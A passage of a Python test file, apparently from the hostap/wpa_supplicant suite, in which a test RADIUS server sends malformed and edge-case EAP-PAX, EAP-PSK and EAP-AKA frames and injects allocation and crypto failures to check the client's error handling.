return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
255, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported Public Key ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, 255,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: More fragments")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_MF,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ICV")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ICV in short frame")
return struct.pack(">BBHBBBBBB3L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 12,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - unsupported op_code")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
255, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0x90, 0x78, 0x97, 0x38, 0x29, 0x94, 0x32, 0xd4,
0x81, 0x27, 0xe0, 0xf6, 0x3b, 0x0d, 0xb2, 0xb2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - CE flag in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_CE,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0x9c, 0x98, 0xb4, 0x0b, 0x94, 0x90, 0xde, 0x88,
0xb7, 0x72, 0x63, 0x44, 0x1d, 0xe3, 0x7c, 0x5c)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - too short STD-1 payload")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0xda, 0xab, 0x2c, 0xe7, 0x84, 0x41, 0xb5, 0x5c,
0xee, 0xcf, 0x62, 0x03, 0xc5, 0x69, 0xcb, 0xf4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - incorrect A length in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0, 0, 0, 0, 0, 0,
0xc4, 0xb0, 0x81, 0xe4, 0x6c, 0x8c, 0x20, 0x23,
0x60, 0x46, 0x89, 0xea, 0x94, 0x60, 0xf3, 0x2a)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - extra data in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8LB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 1 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
1,
0x61, 0x49, 0x65, 0x37, 0x21, 0xe8, 0xd8, 0xbf,
0xf3, 0x02, 0x01, 0xe5, 0x42, 0x51, 0xd3, 0x34)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected STD-1")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xe5, 0x1d, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MAC ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_HMAC_SHA256_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x00, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: DH Group ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_2048_MODP,
EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x01, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Public Key ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE,
EAP_PAX_PUBLIC_KEY_RSAES_OAEP,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x02, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected STD-3")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_3, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x47, 0xbb, 0xc0, 0xf9, 0xb9, 0x69, 0xf5, 0xcb,
0x3a, 0xe8, 0xe7, 0xd6, 0x80, 0x28, 0xf2, 0x59)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
# TODO: MAC calculation; for now, this gets dropped due to incorrect
# ICV
logger.info("Test: STD-3 with CE flag")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_3, EAP_PAX_FLAGS_CE,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x8a, 0xc2, 0xf9, 0xf4, 0x8b, 0x75, 0x72, 0xa2,
0x4d, 0xd3, 0x1e, 0x54, 0x77, 0x04, 0x05, 0xe2)
idx += 1
if ctx['num'] & 0x1 == idx & 0x1:
logger.info("Test: Default request")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PAX)
else:
logger.info("Test: Default EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(pax_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 18):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
logger.info("Waiting for EAP method to start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
logger.info("Too short password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
password_hex="0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
logger.info("No password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_pax_errors(dev, apdev):
"""EAP-PAX local error cases"""
check_eap_capa(dev[0], "PAX")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_pax_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ "eap_msg_alloc;eap_pax_alloc_resp;eap_pax_process_std_1",
"eap_msg_alloc;eap_pax_alloc_resp;eap_pax_process_std_3",
"eap_pax_getKey",
"eap_pax_get_emsk",
"eap_pax_get_session_id" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "os_get_random;eap_pax_process_std_1"),
(1, "eap_pax_initial_key_derivation"),
(1, "eap_pax_mac;eap_pax_process_std_3"),
(2, "eap_pax_mac;eap_pax_process_std_3"),
(1, "eap_pax_kdf;eap_pax_getKey"),
(1, "eap_pax_kdf;eap_pax_get_emsk") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_psk(dev, apdev):
"""EAP-PSK protocol tests"""
def psk_handler(ctx, req):
logger.info("psk_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Non-zero T in first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0xc0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short third message")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Incorrect T in third message")
return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing PCHANNEL in third message")
return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16,
EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalic MAC_S in third message")
return struct.pack(">BBHBB4L4L5LB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16 + 21,
EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(psk_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 6):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="user",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
logger.info("Test: Invalid PSK length")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="user",
password_hex="0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_psk_errors(dev, apdev):
"""EAP-PSK local error cases"""
check_eap_capa(dev[0], "PSK")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0]['ifname'], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_psk_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 4):
with fail_test(dev[0], i, "eap_psk_key_setup;eap_psk_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "=eap_psk_process_1"),
(2, "=eap_psk_process_1"),
(1, "eap_msg_alloc;eap_psk_process_1"),
(1, "=eap_psk_process_3"),
(2, "=eap_psk_process_3"),
(1, "eap_msg_alloc;eap_psk_process_3"),
(1, "eap_psk_getKey"),
(1, "eap_psk_get_session_id"),
(1, "eap_psk_get_emsk") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL",
note="No allocation failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "os_get_random;eap_psk_process_1"),
(1, "omac1_aes_128;eap_psk_process_3"),
(1, "aes_128_eax_decrypt;eap_psk_process_3"),
(2, "aes_128_eax_decrypt;eap_psk_process_3"),
(3, "aes_128_eax_decrypt;eap_psk_process_3"),
(1, "aes_128_eax_encrypt;eap_psk_process_3"),
(2, "aes_128_eax_encrypt;eap_psk_process_3"),
(3, "aes_128_eax_encrypt;eap_psk_process_3"),
(1, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(2, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(3, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(4, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(5, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(6, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(7, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(8, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(9, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(10, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(1, "aes_128_ctr_encrypt;aes_128_eax_decrypt;eap_psk_process_3"),
(1, "aes_128_ctr_encrypt;aes_128_eax_encrypt;eap_psk_process_3") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL",
note="No failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
EAP_SIM_SUBTYPE_START = 10
EAP_SIM_SUBTYPE_CHALLENGE = 11
EAP_SIM_SUBTYPE_NOTIFICATION = 12
EAP_SIM_SUBTYPE_REAUTHENTICATION = 13
EAP_SIM_SUBTYPE_CLIENT_ERROR = 14
EAP_AKA_SUBTYPE_CHALLENGE = 1
EAP_AKA_SUBTYPE_AUTHENTICATION_REJECT = 2
EAP_AKA_SUBTYPE_SYNCHRONIZATION_FAILURE = 4
EAP_AKA_SUBTYPE_IDENTITY = 5
EAP_AKA_SUBTYPE_NOTIFICATION = 12
EAP_AKA_SUBTYPE_REAUTHENTICATION = 13
EAP_AKA_SUBTYPE_CLIENT_ERROR = 14
EAP_SIM_AT_RAND = 1
EAP_SIM_AT_AUTN = 2
EAP_SIM_AT_RES = 3
EAP_SIM_AT_AUTS = 4
EAP_SIM_AT_PADDING = 6
EAP_SIM_AT_NONCE_MT = 7
EAP_SIM_AT_PERMANENT_ID_REQ = 10
EAP_SIM_AT_MAC = 11
EAP_SIM_AT_NOTIFICATION = 12
EAP_SIM_AT_ANY_ID_REQ = 13
EAP_SIM_AT_IDENTITY = 14
EAP_SIM_AT_VERSION_LIST = 15
EAP_SIM_AT_SELECTED_VERSION = 16
EAP_SIM_AT_FULLAUTH_ID_REQ = 17
EAP_SIM_AT_COUNTER = 19
EAP_SIM_AT_COUNTER_TOO_SMALL = 20
EAP_SIM_AT_NONCE_S = 21
EAP_SIM_AT_CLIENT_ERROR_CODE = 22
EAP_SIM_AT_KDF_INPUT = 23
EAP_SIM_AT_KDF = 24
EAP_SIM_AT_IV = 129
EAP_SIM_AT_ENCR_DATA = 130
EAP_SIM_AT_NEXT_PSEUDONYM = 132
EAP_SIM_AT_NEXT_REAUTH_ID = 133
EAP_SIM_AT_CHECKCODE = 134
EAP_SIM_AT_RESULT_IND = 135
EAP_SIM_AT_BIDDING = 136
def test_eap_proto_aka(dev, apdev):
"""EAP-AKA protocol tests"""
def aka_handler(ctx, req):
logger.info("aka_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_AKA)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, 255, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Client Error")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CLIENT_ERROR, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short attribute header")
return struct.pack(">BBHBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated attribute")
return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short attribute data")
return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Skippable/non-skippable unrecognzized attribute")
return struct.pack(">BBHBBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 10,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
255, 1, 0, 127, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request without ID type")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
